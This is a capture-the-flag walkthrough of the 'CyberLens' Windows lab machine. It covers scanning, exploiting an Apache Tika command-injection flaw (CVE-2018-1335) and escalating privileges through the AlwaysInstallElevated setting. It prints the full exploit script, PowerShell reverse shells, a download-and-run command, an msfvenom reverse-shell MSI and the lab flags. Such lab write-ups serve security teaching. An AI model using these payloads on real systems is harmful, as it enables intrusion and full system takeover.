Cyber Lens
Scanning
# Nmap 7.94SVN scan initiated Mon Feb 17 08:13:49 2025 as: nmap -sC -sV -oN nmap 10.10.182.183
Nmap scan report for cyberlens.thm (10.10.182.183)
Host is up (0.051s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64))
|_http-server-header: Apache/2.4.57 (Win64)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: CyberLens: Unveiling the Hidden Matrix
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: CYBERLENS
| NetBIOS_Domain_Name: CYBERLENS
| NetBIOS_Computer_Name: CYBERLENS
| DNS_Domain_Name: CyberLens
| DNS_Computer_Name: CyberLens
| Product_Version: 10.0.17763
|_ System_Time: 2025-02-17T13:14:12+00:00
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2025-02-16T12:31:00
|_Not valid after: 2025-08-18T12:31:00
|_ssl-date: 2025-02-17T13:14:23+00:00; 0s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-02-17T13:14:14
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 17 08:14:24 2025 -- 1 IP address (1 host up) scanned in 34.99 seconds
I have 5 ports: 80 http, 135 msrpc, 139 netbios-ssn, 445 microsoft-ds? and 3389 ms-wbt-server.
Now during the challenge, I did not know much about the Windows environment and with the help of ChatGPT I searched and learned each of the ports I did not know about because each of them could be an attack vector or be used during the exploitation process in a way or another.
Web enumeration
I started my enumeration process with the website, and it seems pretty basic with a functionality to extract metadata from an uploaded image.
The next thing is to upload a random image and see how the function extracts the metadata. The function generated a long output but nothing interesting in the image metadata as I uploaded a random image.
Now I want to understand how the function works starting looking for the function from the source code.
Analyzing the page source I can clearly see the script and the endpoint it is contacting to examine the image metadata.
document.addEventListener("DOMContentLoaded", function() {
document.getElementById("metadataButton").addEventListener("click", function() {
var fileInput = document.getElementById("imageFileInput");
var file = fileInput.files[0];
var reader = new FileReader();
reader.onload = function() {
var fileData = reader.result;
fetch("http://cyberlens.thm:61777/meta", {
method: "PUT",
body: fileData,
headers: {
"Accept": "application/json",
"Content-Type": "application/octet-stream"
}
})
.then(response => {
if (response.ok) {
return response.json();
} else {
throw new Error("Error: " + response.status);
}
})
.then(data => {
var metadataOutput = document.getElementById("metadataOutput");
metadataOutput.innerText = JSON.stringify(data, null, 2);
})
.catch(error => {
console.error("Error:", error);
});
};
reader.readAsArrayBuffer(file);
});
});http://cyberlens.thm:61777/ and to access this endpoint I have to update my /etc/hosts file.127.0.0.1 localhost
127.0.1.1 kali
10.10.158.180 cyberlens.thm
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
By visiting the URL I can see all the methods, the server name and the version.
By searching the server name and the version in searchsploit a CVE pops up.
$ searchsploit apache tika 1.17
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit) | windows/remote/47208.rb
Apache Tika-server < 1.18 - Command Injection | windows/remote/46540.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Here my first choice is the 46540.py because it is Python and it is not a Metasploit module meaning I can use it almost out of the box.
Remote code execution (RCE)
######################################################################################################
#Description: This is a PoC for remote command execution in Apache Tika-server.
#Versions Affected: Tika-server versions < 1.18
#Researcher: David Yesland Twitter: @Daveysec
#Blog Link: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika
#NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2018-1335
######################################################################################################
import sys
import requests
if len(sys.argv) < 4:
print "Usage: python CVE-2018-1335.py <host> <port> <command>"
print "Example: python CVE-2018-1335.py localhost 9998 calc.exe"
else:
host = sys.argv[1]
port = sys.argv[2]
cmd = sys.argv[3]
url = host + str(port) + "/meta"
headers = {"X-Tika-OCRTesseractPath": ""cscript"",
"X-Tika-OCRLanguage": "//E:Jscript",
"Expect": "100-continue",
"Content-type": "image/jp2",
"Connection": "close"}
jscript = '''var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c {}');'''.format(cmd)
try:
requests.put("https://" + url, headers=headers, data=jscript, verify=False)
except:
try:
requests.put("http://" + url, headers=headers, data=jscript)
except:
print "Something went wrong. Usage: python CVE-2018-1335.py <host> <port> <command>"
The exploit is pretty simple to understand, what it needs is just the remote host remote port and the command to execute. I will test it by executing a simple command such as dir. Note that the sccript is written in Python2 so make sure to user that version of Python and give execution permission ot the ascript. chmod +x 46540.py
After executing the command $ python2 46540.py cyberlens.thm 61777 dir I did not receive any response from the server. This makes me think that the code runs but the output is not reported to me. I can test if the code is successfully executed by trying to download a file from my Kali box. The idea behind this is that if my webserver receives a connection from that target host it means the code was successfully executed. To test this I will use the command curl.
Here I can clearly see the successful execution of the code as I received the connection back from the target machine to my webserver. Now I have to craft a payload to get a reverse shell.
Shell as CyberLens
The idea here is to give a command to receive a reverse shell, but if I write directly the reverse shell in the following way:
$ python2 cyberlens.thm 61777 'powershell -c "New-Object System.Net.Sockets.TCPClient("10.0.2.4",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"'This gives errors as there is a mix of single and double quotes messing up with the most external single quotes which encloses the powershell command. I also tried to encode the code in Base64 in the following way, and it was also giving me erorrs due to the mixture of single and double quotes.
$Text = 'Code to encode'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.84", 4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535 | %{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (iex $data 2>&1 | Out-String);
$sendback2 = $sendback + "# ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length);
$stream.Flush();
}
$client.Close();
python2 46540.py cyberlens.thm 61777 'powershell -command "IEX(New-Object Net.WebClient).downloadString('http://10.21.112.161:8000/rev.ps1')". To avoid any error I will encode the Powershell command in Base64.$payload = "IEX(New-Object Net.WebClient).downloadString('http://10.21.112.161:8000/rev.ps1')"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($payload)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText
SQBFAFgAKABOA[...REDACTED...]gBlAHYALgBwAHMAMQAnACkA
Navigatin to the Desktop of the current user I can find the flag.
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.21.112.161] from (UNKNOWN) [10.10.133.177] 49860
C:\Windows\system32> cd C:/
C:\> cd /Users
C:\Users> cd CyberLens/Desktop
C:\Users\CyberLens\Desktop> dir
Directory: C:\Users\CyberLens\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2016 3:36 PM 527 EC2 Feedback.website
-a---- 6/21/2016 3:36 PM 554 EC2 Microsoft Windows Guide.website
-a---- 6/6/2023 7:54 PM 25 user.txt
C:\Users\CyberLens\Desktop> type user.txt
THM{T1k4-CV3-f0r-7h3-w1n}
The next step is to do privilege escalation.
Enumeration
One trick that I learnt from a friend of mine is the command tree. I use this command all the time for my personal use. I'm not sure why didn't I think earlier, it is so helpful and makes the search easy and easy to visualise all the files.
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.21.112.161] from (UNKNOWN) [10.10.77.142] 49757
C:\Windows\system32> cd C:/Users
C:\Users> tree /f
Folder PATH listing
Volume serial number is A8A4-C362
C:.
????Administrator
????CyberLens
? ????3D Objects
? ????Contacts
? ????Desktop
? ? EC2 Feedback.website
? ? EC2 Microsoft Windows Guide.website
? ? user.txt
? ?
? ????Documents
? ? ????Management
? ? CyberLens-Management.txt
? ?
? ????Downloads
? ????Favorites
? ? ? Bing.url
? ? ?
? ? ????Links
? ????Links
? ? Desktop.lnk
? ? Downloads.lnk
? ?
? ????Music
? ????Pictures
? ????Saved Games
? ????Searches
? ????Videos
????Public
????Documents
????Downloads
????Music
????Pictures
????Videos
C:\Users> type CyberLens\Documents\Management\CyberLens-Management.txt
Remember, manual enumeration is often key in an engagement ;)
CyberLens
HackSmarter123
Listing the file structure the only interesting file is CyberLens-Management.txt which contains credentials. Thinking about the Nmap scan the only other service where I can use credentials is the Remote Desktop Protocol (RDP). The RDP program that I will use is xfreerdp but remmina is also a very good alternative that I love to use. xfreerdp /u:CyberLens /p:HackSmarter123 /v:10.10.77.142 +clipboard
Privilege escalation
For the privilege escalation, I used WinPeas, I copied the raw text from GitHub and pasted it into the note saving it with the .bat extension.
I run the script from Powershell, I prefer it as it has a maller font.
After spending some time, analysing the output, testing things and failing I found a misconfiguration.
You can find more tails about this vulneability on GitHub.
"AlwaysInstallElevated" is a Windows Registry setting that affects the behavior of the Windows Installer service. The vulnerability arises when the "AlwaysInstallElevated" registry key is configured with a value of "1" in the Windows Registry.When this registry key is enabled, it allows non-administrator users to install software packages with elevated privileges. In other words, users who shouldn't have administrative rights can exploit this vulnerability to execute arbitrary code with elevated permissions, potentially compromising the security of the system.
What the description is saying is that with that flag enabled the installation process of software is performed with high privileges even when the installation is launched by low-privileged accounts. Now it becomes clear that I have to create a malicious installation file with .msi extension to elevate my privileges.
To create a malicious Windows installation file I can use Msfvenom with the following command:
$ msfvenom -p windows/shell_reverse_tcp lhost=10.21.112.161 lport=3333 -f msi > reverse.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of msi file: 159744 bytes
The next step is to upload reverse.msi into the target Windows machine via a Python web server and the command curl.
First, I will open a Python webserver in the same forlder as the reverse.msi:
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.232.185 - - [23/Feb/2025 06:36:44] "GET /reverse.msi HTTP/1.1" 200 -
I will also open a Netcat listener on my Kali on port 3333, the same port as specified during the creation of the .msi file. nc -lvnp 3333.
Now from the target machine, I will download the file with curl and execute it.
C:\Users\CyberLens>curl http://10.21.112.161:8000/reverse.msi --output reverse.msi
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 156k 100 156k 0 0 156k 0 0:00:01 --:--:-- 0:00:01 369k
Upon executing the installation file a warning message will be prompted, just press "ok" to receive the reverse shell on the listening Netcat session on port 3333 previously opened.
$ nc -lvnp 3333
listening on [any] 3333 ...
connect to [10.21.112.161] from (UNKNOWN) [10.10.232.185] 49811
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>type admin.txt
type admin.txt
THM{3lev@t3D-4-pr1v35c!}